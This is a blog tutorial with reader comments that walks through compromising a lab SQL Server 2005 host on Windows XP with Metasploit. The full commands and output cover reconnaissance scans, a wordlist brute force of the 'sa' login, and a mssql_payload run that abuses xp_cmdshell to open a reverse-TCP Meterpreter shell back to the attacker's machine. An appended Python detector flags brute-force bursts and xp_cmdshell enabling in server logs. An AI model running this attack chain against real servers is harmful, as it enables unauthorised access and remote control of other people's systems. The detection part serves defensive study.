Tutorial: Exploiting MS SQL Server with Metasploit – Fast Track

July 20, 2016 | Views: 21473


The exploitee’s system comprises: 

  • Windows XP Pro Service Pack 2 (unpatched)
  • Firewall and software updates switched off
  • Microsoft Internet Information Services (IIS) web server and FTP service enabled
  • SQL Server 2005 Express configured
  • A vulnerable web app up and running


Let’s begin: Nmap scan from within Metasploit. The pertinent results for this exploit are:

1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00

Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Interestingly, Nmap couldn’t definitively identify which Windows Service Pack, but of course, I know it’s Service Pack 2.

MS SQL Server listens by default on TCP port 1433, and the SQL Server Browser (instance discovery) service on UDP port 1434, so I need to confirm port 1434:

nmap -sU 192.168.1.79 -p1434

PORT STATE SERVICE
1434/udp open|filtered ms-sql-m

The scan reports the port as open|filtered: Nmap received no UDP reply, so it cannot tell an open port from a filtered one on its own. The mssql_ping result below, which talks to the Browser service on that port, settles it.

Now, use the Metasploit mssql_ping module, which queries the SQL Server Browser service on UDP 1434, to pick up more information:

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

There’s lots of information here. Now, brute-force the MS SQL login with mssql_login:

msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit

[+] 192.168.1.79:1433 - MSSQL - successful login 'sa' : 'password1'

MS SQL password and login successfully guessed.

Now, use the mssql_payload module, which abuses the xp_cmdshell extended stored procedure (re-enabling it first if it is disabled) to stage and run the payload over the guessed sa login:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it...
[*] Command Stager progress - 1.47% done (1499/102246 bytes)

[...]

[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100

meterpreter >


So, I’m inside the target machine with the Meterpreter shell.
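As an added defensive example that is not part of the original post, the following Python scans a constructed SQL Server ERRORLOG excerpt for the trail this walkthrough leaves on the server: a burst of failed 'sa' logins from one client, a success immediately after it, and the 'xp_cmdshell' configuration change that mssql_payload triggers. The log lines, the thresholds and the detect() function are my own construction; note that successful logins only reach the ERRORLOG when login auditing is set to record both failed and successful logins.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt (not from the original post): five failed 'sa' logins
# from one client within a few seconds, a success, then xp_cmdshell being switched on.
# The last line is an unrelated single failure that must NOT be flagged.
SAMPLE_LOG = """\
2016-07-20 10:39:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.70]
2016-07-20 10:39:01.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.70]
2016-07-20 10:39:01.52 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.70]
2016-07-20 10:39:01.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.70]
2016-07-20 10:39:02.03 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.70]
2016-07-20 10:39:02.25 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.1.70]
2016-07-20 10:39:40.01 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2016-07-20 11:15:00.00 Logon       Login failed for user 'app'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
"""

LINE_RE = re.compile(r"^(\S+ \S+) +(\S+) +(.*)$")          # timestamp, source, message
LOGIN_RE = re.compile(r"Login (failed|succeeded) for user '([^']+)'.*\[CLIENT: ([\d.]+)\]")
XP_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")

def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return (finding, client, user) tuples: a failure burst per (client, user),
    a success that follows such a burst, and any xp_cmdshell enable event."""
    findings = []
    failures = defaultdict(list)   # (client, user) -> timestamps of recent failed logins
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
        msg = m.group(3)
        if XP_RE.search(msg):
            findings.append(("xp_cmdshell_enabled", None, None))
            continue
        lm = LOGIN_RE.search(msg)
        if not lm:
            continue
        outcome, user, client = lm.groups()
        key = (client, user)
        recent = [t for t in failures[key] if ts - t <= window]   # slide the window
        if outcome == "failed":
            recent.append(ts)
            failures[key] = recent
            if len(recent) == threshold:          # report the burst once, when it crosses
                findings.append(("bruteforce", client, user))
        elif len(recent) >= threshold:            # success right after a burst: guessed
            findings.append(("bruteforce_success", client, user))
            failures[key] = []
    return findings
```

On a real host the same logic can be pointed at the ERRORLOG file, or at the equivalent Windows Application log events, and the two login findings together are the signature of the mssql_login step above.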


I hope this was helpful to you. Please post your comments and questions below.

12 Comments
  1. Thanks. Tried with my Kali machine and target machine – SQL Server 2005/Windows XP. Works great. Nice way to learn and play with exploitation locally. Appreciate your effort.

  2. You’re so hacker huh? I am so amazed with: “[+] 192.168.1.79:1433 - MSSQL - successful login 'sa' : 'password1'” Dude, you rock! You gotta use a Metasploit to guess default creds. Well, well… What else? Another Metasploit tutor on sniffing telnet session? Don’t forget to add another copypasta like colleagues from India used to.

    • Kid! It’s a community forum where we have to start from basics. 🙂

      If you want to do specialisation then pay for it. Quality comes with price, kid!

  3. I think this post is talking about vuln that can upload or execute remote code, right?
